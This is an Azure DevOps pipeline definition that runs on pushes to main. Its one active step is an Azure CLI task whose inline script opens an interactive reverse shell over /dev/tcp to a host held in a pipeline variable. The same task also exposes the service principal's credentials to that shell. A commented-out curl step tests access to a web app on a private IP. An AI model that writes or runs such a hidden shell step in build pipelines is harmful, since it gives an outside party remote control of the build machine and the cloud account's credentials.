trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:
- task: AzureCLI@2
  inputs:
    azureSubscription: foo
    scriptType: bash
    scriptLocation: inlineScript
    inlineScript: |
        sh -i >& "/dev/tcp/$(ME)" 0>&1
    addSpnToEnvironment: true
    

  # - task: Bash@3
  #   inputs:
  #     targetType: 'inline'
  #     script: curl --resolve cns-vnet-test.azurewebsites.net:443:10.0.0.4 https://cns-vnet-test.azurewebsites.net
